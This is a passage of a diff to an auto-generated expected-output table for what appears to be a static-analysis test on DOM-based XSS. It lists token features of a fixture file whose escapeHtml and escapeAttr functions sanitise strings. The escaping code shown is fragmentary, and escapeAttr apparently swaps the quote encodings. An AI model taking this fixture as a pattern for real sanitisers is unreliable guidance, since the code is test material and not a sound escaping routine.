autogenerated/Xss/DomBasedXss/sanitiser.js:2:21:2:22 | lt | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:21:2:22 | lt | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:21:2:22 | lt | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:21:2:29 | lt | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:21:2:29 | lt | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:21:2:29 | lt | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:21:2:29 | lt | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:21:2:29 | lt | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:21:2:29 | lt = //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:21:2:29 | lt = //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:26:2:29 | //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:32:2:33 | gt | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:32:2:33 | gt | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:32:2:40 | gt | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:32:2:40 | gt | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:32:2:40 | gt | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:32:2:40 | gt | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:32:2:40 | gt | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:32:2:40 | gt = />/g | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:32:2:40 | gt = />/g | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:32:2:40 | gt = />/g | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:32:2:40 | gt = />/g | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:32:2:40 | gt = />/g | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:37:2:40 | />/g | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:37:2:40 | />/g | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:37:2:40 | />/g | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:37:2:40 | />/g | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:2:37:2:40 | />/g | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:3:12 | s | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:3:12 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:3:12 | s | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:3:12 | s | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:3:12 | s | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:3:21 | s.toString | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:3:21 | s.toString | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:3:21 | s.toString | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:3:21 | s.toString | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:3:21 | s.toString | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:3:23 | exceptional return of s.toString() | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:3:23 | exceptional return of s.toString() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:3:23 | exceptional return of s.toString() | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:3:23 | exceptional return of s.toString() | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:3:23 | exceptional return of s.toString() | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:3:23 | s.toString() | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:3:23 | s.toString() | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:3:23 | s.toString() | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:3:23 | s.toString() | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:3:23 | s.toString() | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:4:16 | s.toStr ... replace | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:4:16 | s.toStr ... replace | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:4:16 | s.toStr ... replace | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:4:16 | s.toStr ... replace | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:4:16 | s.toStr ... replace | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:4:30 | exceptional return of s.toStr ... &') | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:4:30 | exceptional return of s.toStr ... &') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:4:30 | exceptional return of s.toStr ... &') | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:4:30 | exceptional return of s.toStr ... &') | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:4:30 | exceptional return of s.toStr ... &') | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:4:30 | s.toStr ... &') | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:4:30 | s.toStr ... &') | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:4:30 | s.toStr ... &') | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:4:30 | s.toStr ... &') | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:4:30 | s.toStr ... &') | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:5:16 | s.toStr ... replace | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:5:16 | s.toStr ... replace | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:5:16 | s.toStr ... replace | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:5:16 | s.toStr ... replace | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:5:16 | s.toStr ... replace | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:5:28 | exceptional return of s.toStr ... '<') | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:5:28 | exceptional return of s.toStr ... '<') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:5:28 | exceptional return of s.toStr ... '<') | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:5:28 | exceptional return of s.toStr ... '<') | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:5:28 | exceptional return of s.toStr ... '<') | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:5:28 | s.toStr ... '<') | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:5:28 | s.toStr ... '<') | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:5:28 | s.toStr ... '<') | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:5:28 | s.toStr ... '<') | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:5:28 | s.toStr ... '<') | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:6:16 | s.toStr ... replace | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:6:16 | s.toStr ... replace | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:6:16 | s.toStr ... replace | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:6:16 | s.toStr ... replace | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:6:16 | s.toStr ... replace | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:6:28 | exceptional return of s.toStr ... '>') | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:6:28 | exceptional return of s.toStr ... '>') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:6:28 | exceptional return of s.toStr ... '>') | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:6:28 | exceptional return of s.toStr ... '>') | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:6:28 | exceptional return of s.toStr ... '>') | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:6:28 | s.toStr ... '>') | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:6:28 | s.toStr ... '>') | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:6:28 | s.toStr ... '>') | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:6:28 | s.toStr ... '>') | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:12:6:28 | s.toStr ... '>') | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:14:3:21 | toString | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:14:3:21 | toString | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:14:3:21 | toString | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:14:3:21 | toString | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:3:14:3:21 | toString | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:4:10:4:16 | replace | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:4:10:4:16 | replace | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/sanitiser.js:4:10:4:16 | replace | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:4:10:4:16 | replace | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:4:10:4:16 | replace | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:4:18:4:20 | amp | CalleeFlexibleAccessPath | s.toString().replace | | autogenerated/Xss/DomBasedXss/sanitiser.js:4:18:4:20 | amp | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/sanitiser.js:4:18:4:20 | amp | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | @@ -14776,6 +107620,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/sanitiser.js:4:23:4:29 | '&' | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | | autogenerated/Xss/DomBasedXss/sanitiser.js:4:23:4:29 | '&' | enclosingFunctionName | escapeHtml | | autogenerated/Xss/DomBasedXss/sanitiser.js:4:23:4:29 | '&' | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:5:10:5:16 | replace | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:5:10:5:16 | replace | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/sanitiser.js:5:10:5:16 | replace | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:5:10:5:16 | replace | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:5:10:5:16 | replace | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:5:18:5:19 | lt | CalleeFlexibleAccessPath | s.toString().replace().replace | | autogenerated/Xss/DomBasedXss/sanitiser.js:5:18:5:19 | lt | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/sanitiser.js:5:18:5:19 | lt | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | @@ -14790,6 +107639,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/sanitiser.js:5:22:5:27 | '<' | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | | autogenerated/Xss/DomBasedXss/sanitiser.js:5:22:5:27 | '<' | enclosingFunctionName | escapeHtml | | autogenerated/Xss/DomBasedXss/sanitiser.js:5:22:5:27 | '<' | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:6:10:6:16 | replace | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:6:10:6:16 | replace | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/sanitiser.js:6:10:6:16 | replace | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | +| autogenerated/Xss/DomBasedXss/sanitiser.js:6:10:6:16 | replace | enclosingFunctionName | escapeHtml | +| autogenerated/Xss/DomBasedXss/sanitiser.js:6:10:6:16 | replace | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:6:18:6:19 | gt | CalleeFlexibleAccessPath | s.toString().replace().replace().replace | | autogenerated/Xss/DomBasedXss/sanitiser.js:6:18:6:19 | gt | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/sanitiser.js:6:18:6:19 | gt | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | @@ -14804,6 +107658,102 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/sanitiser.js:6:22:6:27 | '>' | enclosingFunctionBody | s amp /&/g lt //g s toString replace amp & replace lt < replace gt > | | autogenerated/Xss/DomBasedXss/sanitiser.js:6:22:6:27 | '>' | enclosingFunctionName | escapeHtml | | autogenerated/Xss/DomBasedXss/sanitiser.js:6:22:6:27 | '>' | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:1:9:0 | this | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:1:9:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:1:9:0 | this | enclosingFunctionBody | s s toString replace /'/g %22 replace /"/g %27 | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:1:9:0 | this | enclosingFunctionName | escapeAttr | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:1:9:0 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:1:13:1 | 'arguments' object of function escapeAttr | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:1:13:1 | 'arguments' object of function escapeAttr | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:1:13:1 | 'arguments' object of function escapeAttr | enclosingFunctionBody | s s toString replace /'/g %22 replace /"/g %27 | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:1:13:1 | 'arguments' object of function escapeAttr | enclosingFunctionName | escapeAttr | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:1:13:1 | 'arguments' object of function escapeAttr | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:1:13:1 | exceptional return of function escapeAttr | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:1:13:1 | exceptional return of function escapeAttr | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:1:13:1 | exceptional return of function escapeAttr | enclosingFunctionBody | s s toString replace /'/g %22 replace /"/g %27 | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:1:13:1 | exceptional return of function escapeAttr | enclosingFunctionName | escapeAttr | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:1:13:1 | exceptional return of function escapeAttr | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:1:13:1 | functio ... 27');\\n} | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:1:13:1 | functio ... 27');\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:1:13:1 | functio ... 27');\\n} | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:1:13:1 | return of function escapeAttr | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:1:13:1 | return of function escapeAttr | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:1:13:1 | return of function escapeAttr | enclosingFunctionBody | s s toString replace /'/g %22 replace /"/g %27 | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:1:13:1 | return of function escapeAttr | enclosingFunctionName | escapeAttr | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:1:13:1 | return of function escapeAttr | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:10:9:19 | escapeAttr | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:10:9:19 | escapeAttr | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:10:9:19 | escapeAttr | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:21:9:21 | s | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:21:9:21 | s | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:21:9:21 | s | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:21:9:21 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:21:9:21 | s | enclosingFunctionBody | s s toString replace /'/g %22 replace /"/g %27 | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:21:9:21 | s | enclosingFunctionBody | s s toString replace /'/g %22 replace /"/g %27 | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:21:9:21 | s | enclosingFunctionName | escapeAttr | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:21:9:21 | s | enclosingFunctionName | escapeAttr | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:21:9:21 | s | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:9:21:9:21 | s | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:10:12 | s | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:10:12 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:10:12 | s | enclosingFunctionBody | s s toString replace /'/g %22 replace /"/g %27 | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:10:12 | s | enclosingFunctionName | escapeAttr | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:10:12 | s | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:10:21 | s.toString | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:10:21 | s.toString | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:10:21 | s.toString | enclosingFunctionBody | s s toString replace /'/g %22 replace /"/g %27 | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:10:21 | s.toString | enclosingFunctionName | escapeAttr | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:10:21 | s.toString | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:10:23 | exceptional return of s.toString() | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:10:23 | exceptional return of s.toString() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:10:23 | exceptional return of s.toString() | enclosingFunctionBody | s s toString replace /'/g %22 replace /"/g %27 | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:10:23 | exceptional return of s.toString() | enclosingFunctionName | escapeAttr | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:10:23 | exceptional return of s.toString() | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:10:23 | s.toString() | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:10:23 | s.toString() | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:10:23 | s.toString() | enclosingFunctionBody | s s toString replace /'/g %22 replace /"/g %27 | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:10:23 | s.toString() | enclosingFunctionName | escapeAttr | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:10:23 | s.toString() | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:11:17 | s.toStr ... replace | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:11:17 | s.toStr ... replace | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:11:17 | s.toStr ... replace | enclosingFunctionBody | s s toString replace /'/g %22 replace /"/g %27 | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:11:17 | s.toStr ... replace | enclosingFunctionName | escapeAttr | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:11:17 | s.toStr ... replace | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:11:30 | exceptional return of s.toStr ... '%22') | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:11:30 | exceptional return of s.toStr ... '%22') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:11:30 | exceptional return of s.toStr ... '%22') | enclosingFunctionBody | s s toString replace /'/g %22 replace /"/g %27 | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:11:30 | exceptional return of s.toStr ... '%22') | enclosingFunctionName | escapeAttr | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:11:30 | exceptional return of s.toStr ... '%22') | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:11:30 | s.toStr ... '%22') | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:11:30 | s.toStr ... '%22') | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:11:30 | s.toStr ... '%22') | enclosingFunctionBody | s s toString replace /'/g %22 replace /"/g %27 | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:11:30 | s.toStr ... '%22') | enclosingFunctionName | escapeAttr | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:11:30 | s.toStr ... '%22') | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:12:17 | s.toStr ... replace | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:12:17 | s.toStr ... replace | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:12:17 | s.toStr ... replace | enclosingFunctionBody | s s toString replace /'/g %22 replace /"/g %27 | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:12:17 | s.toStr ... replace | enclosingFunctionName | escapeAttr | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:12:17 | s.toStr ... replace | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:12:30 | exceptional return of s.toStr ... '%27') | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:12:30 | exceptional return of s.toStr ... '%27') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:12:30 | exceptional return of s.toStr ... '%27') | enclosingFunctionBody | s s toString replace /'/g %22 replace /"/g %27 | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:12:30 | exceptional return of s.toStr ... '%27') | enclosingFunctionName | escapeAttr | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:12:30 | exceptional return of s.toStr ... '%27') | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:12:30 | s.toStr ... '%27') | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:12:30 | s.toStr ... '%27') | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:12:30 | s.toStr ... '%27') | enclosingFunctionBody | s s toString replace /'/g %22 replace /"/g %27 | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:12:30 | s.toStr ... '%27') | enclosingFunctionName | escapeAttr | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:12:12:30 | s.toStr ... '%27') | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:14:10:21 | toString | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:14:10:21 | toString | contextSurroundingFunctionParameters | (s) | +| 